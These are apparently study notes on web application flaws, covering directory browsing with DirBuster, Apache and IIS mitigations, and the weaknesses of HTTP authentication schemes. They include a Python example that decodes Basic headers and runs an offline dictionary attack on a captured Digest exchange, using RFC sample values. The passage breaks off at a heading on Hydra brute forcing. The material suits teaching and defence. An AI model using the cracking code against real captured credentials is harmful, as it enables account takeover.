Major Flaws in Web Applications
- Client-side flaws are targeted flaws: they exploit client-side technologies such as AJAX, JSON and Flash code to extract information from the client (the user's browser and session) rather than from the server.
Directory browsing
- DirBuster (comes as an add-on to the WebScarab proxy, but can also be found as a standalone application). Look out for backup and renamed copies of files by adding extensions such as .bak and .old to every wordlist entry in the scan.
- Comments in HTML code (review them with WebScarab, which extracts the comments from the pages it proxies).
- Mitigation: directory browsing is a per-directory setting, so it needs to be verified on each directory, not just at the web root. In Apache, listing is controlled by the Options Indexes directive and a .htaccess file can override the setting for an individual directory (Options -Indexes), provided AllowOverride permits it. In IIS, the Directory Browsing feature can be set per site or directory using IIS Manager or the appcmd command.
Authentication protocols and flaws:
- Basic authentication: the credentials are sent as Base64(username:password). Base64 is an encoding, not encryption, so it is trivial to reverse and acquire the clear text; the scheme is only as safe as the transport and must never be used without TLS.
- Digest authentication: introduces a server-supplied nonce that acts as a salt when the client proves knowledge of the credentials. Instead of the Base64 value, the client sends an MD5 hash computed over the username, realm, password, nonce, request method and URI, so the password itself never crosses the wire. The nonce stops straightforward replay, but a captured exchange can still be attacked offline with a dictionary, and MD5 gives no real protection there.
- Integrated authentication: when a user accesses a website that leverages integrated (Windows) authentication and the user's machine is part of the same domain, the client passes the user's token and the user is granted access to the application without being prompted. LANMAN, NTLMv1 and NTLMv2 are the underlying challenge/response protocols that make this authentication seamless; LANMAN and NTLMv1 responses are weak enough to crack quickly, and NTLM in general is exposed to relay attacks when signing is not enforced.
- Form-based authentication: credentials are submitted through an HTML form and checked entirely by the application, so account lockout, error messages that reveal valid usernames and transport protection are all the developer's responsibility.
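The difference between the header-based schemes above, as an added example that is not part of these notes: decoding a Basic header, computing the Digest response exactly as RFC 2617 specifies, and then running the offline dictionary attack that the nonce does not prevent. The sample headers are the published RFC 7617 and RFC 2617 examples, embedded here as constructed input; the function names and the capture dictionary are this example's own.

```python
import base64
import hashlib


def parse_basic(header):
    """Recover the clear-text credentials from an HTTP Basic Authorization header.

    Base64 is an encoding, not encryption: anyone who can read the header
    (proxy logs, a sniffer on plain HTTP) has the password.
    """
    scheme, _, blob = header.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic Authorization header")
    user, _, password = base64.b64decode(blob).decode("utf-8").partition(":")
    return user, password


def _md5(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def digest_response(username, realm, password, method, uri, nonce,
                    nc=None, cnonce=None, qop=None):
    """Compute the Digest 'response' value the client sends (RFC 2617).

    HA1 binds the password to the user and realm, HA2 binds the request, and
    the server nonce (plus the client's cnonce/nc when qop is negotiated)
    salts the final hash, so the password itself never crosses the wire.
    Without qop the older RFC 2069 form MD5(HA1:nonce:HA2) is used.
    """
    ha1 = _md5(f"{username}:{realm}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    if qop:
        return _md5(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return _md5(f"{ha1}:{nonce}:{ha2}")


def crack_digest(captured, wordlist):
    """Offline dictionary attack against one sniffed Digest exchange.

    The nonce prevents replaying the captured header, but every input to the
    hash except the password is visible in the captured headers, so an
    attacker can test guesses locally at MD5 speed with no lockout.
    Returns the matching password, or None if the wordlist misses.
    """
    for guess in wordlist:
        candidate = digest_response(
            captured["username"], captured["realm"], guess,
            captured["method"], captured["uri"], captured["nonce"],
            captured.get("nc"), captured.get("cnonce"), captured.get("qop"))
        if candidate == captured["response"]:
            return guess
    return None


# Constructed sample capture: the worked example from RFC 2617 section 3.5
# (user Mufasa, password "Circle Of Life"), as the fields would appear in a
# sniffed Authorization header.
RFC2617_CAPTURE = {
    "username": "Mufasa",
    "realm": "testrealm@host.com",
    "method": "GET",
    "uri": "/dir/index.html",
    "nonce": "dcd98b7102dd2f0e8b11d0f600bfb0c093",
    "nc": "00000001",
    "cnonce": "0a4f113b",
    "qop": "auth",
    "response": "6629fae49393a05397450978507c4ef1",
}


if __name__ == "__main__":
    # RFC 7617 example header, which encodes "Aladdin:open sesame"
    print(parse_basic("Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ=="))
    print(crack_digest(RFC2617_CAPTURE, ["password", "letmein", "Circle Of Life"]))
```

The point of the last function is the one the notes hint at: Digest only raises the bar from "read the password off the wire" to "guess it offline", which a weak password does not survive. Changing the nonce changes the response, which is why a replayed header fails, but it does nothing against guessing.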
Brute forcing credentials:
- Hydra: